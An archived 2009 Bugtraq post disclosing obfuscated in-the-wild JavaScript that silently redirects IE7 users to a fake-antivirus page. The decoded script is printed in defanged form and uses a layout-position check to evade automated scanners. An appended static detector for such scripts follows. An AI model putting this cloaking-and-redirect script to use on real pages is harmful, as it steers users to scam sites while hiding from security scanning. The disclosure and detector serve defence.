Message-ID: <ED4D2B7262D0FF46B802B35FF362FE6804986E38@lincoln.fairfax.phra.com>
Date: Tue, 11 Aug 2009 10:48:58 -0400
From: "James C. Slora Jr." <james.slora@...a.com>
To: <bugtraq@...urityfocus.com>
Subject: IE7 Script

Code found in the wild opens and renders hostile fakeav page on another
site without warning on fully updated IE7 on XP SP2 or XP SP3 32-bit
with current patches. Under IE8, user gets a warning before the hostile
site gets rendered. No warning under IE7. AV also failed to catch the
secondary hostile page until after rendering was complete. AV client
involved was outdated engine with current definitions, and not worth
maligning. Not tested with modern AV.

Not sure what if anything is new about this, but the obfuscation and the
client behavior suggest something of interest. The point seems to be to
render known bad code from a page that robot testers will find to be
clean, and possibly to bypass AV auto-protection.

The exploit was obfuscated javascript. VirusTotal had no complaints
about the script below, whether obfuscated or not.

Here is the script wrapper. I changed script to sXXcript.

<sXXcript type="text/javascript">
document.write( unescape( 'hex for the code below' ) );
</sXXcript>

Nothing at all interesting about the wrapper that I see.

Here is the unescaped child script. I changed the target site name,
which was a different domain from the one where this script was found.


<sXXcript language="javascript">
document.write('<div style="overflow:auto; height: 1px; width: 600px;">');
document.write('<table width="100%">');
document.write('<tr>');
document.write('<td id="first">This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('</tr>');
document.write('<tr>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td id="second">This is good site</td>');
document.write('</tr>');
document.write('</table>');
document.write('</div>');

var D=document;

function AbsPos(O, Parent){
	var X=0, Y=0, Next, D=document;

	Next=O;
	if (Parent==null) Parent=D;
	while (Next!=null && Next!==Parent){
		Y+=Next.offsetTop;
		X+=Next.offsetLeft;
		Next=Next.offsetParent;
	}
	return [X, Y];
}

window.onfocus = function() {
	var first = AbsPos(D.getElementById('first'));
	var second = AbsPos(D.getElementById('second'));

	if (first[0] != second[0]) {
		document.location.href = "http://badsite.bad";
	}
}

</sXXcript>
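
A static triage sketch for scripts shaped like the one in this post, added here as an example and not part of the original message: it decodes the document.write(unescape(...)) wrapper as text without executing it, then flags layout probing and navigation that only fires inside an event handler. The function names, the good.example host and the sample input are constructed for illustration.

```javascript
// Added example (not code from the post); names and SAMPLE are constructed.
// Decode %XX and %uXXXX escapes as text; nothing is evaluated.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Peel nested document.write(unescape('...')) layers, bounded by maxDepth.
function unwrap(source, maxDepth = 5) {
  const re = /document\.write\(\s*unescape\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/i;
  let layers = 0, m;
  for (; layers < maxDepth && (m = re.exec(source)); layers++) source = decodeEscapes(m[2]);
  return { layers, source };
}

// Return the text inside the first {...} at or after `from`.
// Simplification: braces inside string literals are not skipped.
function braceBody(src, from) {
  const start = src.indexOf('{', from);
  for (let i = start, depth = 0; start >= 0 && i < src.length; i++) {
    if (src[i] === '{') depth++;
    else if (src[i] === '}' && --depth === 0) return src.slice(start + 1, i);
  }
  return start < 0 ? '' : src.slice(start + 1); // no brace, or unbalanced
}

// Flag wrapper layers, layout probing and event-gated navigation in html served from pageHost.
function triage(html, pageHost) {
  const { layers, source } = unwrap(html);
  const findings = layers ? [`escaped-wrapper:${layers}`] : [];
  if (/\.offset(Top|Left|Parent)\b/.test(source)) findings.push('layout-probe');
  const handler = /\bon(focus|blur|mouse\w+|load)\s*=\s*function\b/gi;
  const nav = /location(?:\.href)?\s*=\s*(['"])(.*?)\1/i;
  for (let h; (h = handler.exec(source)); ) {
    const n = nav.exec(braceBody(source, handler.lastIndex));
    if (!n) continue;
    let host = pageHost;
    try { host = new URL(n[2], `http://${pageHost}/`).hostname; } catch (e) {}
    findings.push(`${h[1].toLowerCase()}-gated-navigation:` +
      (host === pageHost ? 'same-site' : `cross-site:${host}`));
  }
  return findings;
}

// Constructed sample: a short stand-in child script, percent-encoded inside the wrapper.
const child = 'function pos(o){return o.offsetLeft}' +
  'window.onfocus=function(){if(pos(a)!=pos(b)){location.href="http://badsite.bad"}}';
const SAMPLE = "document.write(unescape('" + Array.from(child,
  c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('') + "'));";
console.log(triage(SAMPLE, 'good.example'));
```

The findings are triage hints for an analyst, not a verdict: each trait also appears in benign pages, and it is the combination on a page that otherwise scans clean that matches what the post describes.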

